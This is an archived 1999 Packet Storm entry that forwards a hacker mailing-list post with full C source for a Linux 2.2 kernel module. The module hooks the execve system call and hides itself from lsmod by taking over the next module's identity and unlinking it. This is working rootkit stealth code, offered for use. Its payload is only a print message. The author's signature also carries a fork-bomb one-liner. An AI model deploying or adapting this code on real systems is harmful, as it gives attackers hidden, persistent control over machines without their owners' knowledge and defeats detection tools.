kernel_hide.txt

1999-09-22T00:00:00
ID PACKETSTORM:15715
Type packetstorm
Reporter Packet Storm
Modified 1999-09-22T00:00:00

Description

                                        
                                            `Subject: [EuroHaCk] stealth-code (fwd)  
To: BUGTRAQ@SECURITYFOCUS.COM   
  
  
---------- Forwarded message ----------  
Date: Wed, 18 Aug 1999 18:56:09 +0200  
From: Martin Markovitz <stealth@dione.ids.pl>  
Reply-To: eurohack@bofh.kyrnet.kg  
To: coders@dione.ids.pl  
Subject: [EuroHaCk] stealth-code  
  
  
  
  
hi,  
  
  
don't think that hiding modules is an old topic. ;-)  
since all the other dirty tricks didn't work on 2.2  
kernel (as using asm-code etc.) i used new  
techniqe to hide modules. example-code below.  
payload is simly print-out-message-at-execution-call  
thingie.  
this module even is stealth enuff ;-) for my radar.c  
module-detector.  
any other suggestions are welcome.  
  
  
cheers,  
Stealth  
  
  
  
  
: ---- main(){fork();main();} ----  
: Hi! I'm a .signature virus! Copy me into your ~/.signature, please!  
: Stealth <-> http://www.kalug.lug.net/stealth  
  
  
/*** A kernel-module for 2.2 kernels, hiding itself.  
*** It was easier in 2.0 kernels and i found all the old  
*** techniqes not to work. So i invented new one. ;-)  
*** (C) 1999/2000 by Stealth.  
*** All under the GPL. SO YOU USE IT AT YOUR OWN RISK.  
*** http://www.kalug.lug.net/stealth  
***  
*** Greets to all my friends, you know who you are.  
***/  
#define __KERNEL__  
#define MODULE  
#include <linux/module.h>  
#include <linux/kernel.h>  
#include <sys/syscall.h>  
#include <linux/unistd.h>  
#include <linux/sched.h>  
#include <asm/uaccess.h>  
#include <linux/mm.h>  
#include <linux/smp_lock.h>  
#ifndef NULL  
#define NULL ((void*)0)  
#endif  
  
  
extern void *sys_call_table[];  
int (*old_exec)(struct pt_regs regs);  
  
  
int new_exec(struct pt_regs regs)  
{  
int error = 0;  
char *filename;  
  
  
lock_kernel();  
filename = getname((char*)regs.ebx);  
error = PTR_ERR(filename);  
if (IS_ERR(error))  
goto out;  
  
  
printk("Hi, the hook is still installed. ;-)\n");  
error = do_execve(filename, (char**)regs.ecx, (char**)regs.edx, &regs);  
putname(filename);  
out:  
unlock_kernel();  
return error;  
}  
  
  
  
int init_module()  
{  
int i = 0;  
struct module *m = &__this_module, *lastm = NULL,  
*to_delete = NULL;  
  
EXPORT_NO_SYMBOLS;  
  
  
/* install hook */  
old_exec = sys_call_table[__NR_execve];  
sys_call_table[__NR_execve] = new_exec;  
  
  
/* get next module-struct */  
to_delete = m->next;  
if (!to_delete) {  
printk("No module found for exchange }|-(\n");  
return 0;  
}  
  
  
/* and steal all information about it */  
m->name = to_delete->name;  
m->size = to_delete->size;  
m->flags = to_delete->flags;  
  
/* even set the right USE_COUNT */  
for (i = 0; i < GET_USE_COUNT(to_delete); i++)   
MOD_INC_USE_COUNT;  
  
/* and drop the attacked module from the list  
* this won't delete it but makes it disapear for lsmod  
*/  
m->next = to_delete->next;  
  
  
printk("The following modules are visible now:\n");  
while (m) {  
printk("%s\n", m->name);  
m = m->next;  
}  
printk("Tzzz... (sleeping)\n");  
return 0;  
}  
  
  
int cleanup_module()  
{  
sys_call_table[__NR_execve] = old_exec;  
return 0;  
}  
`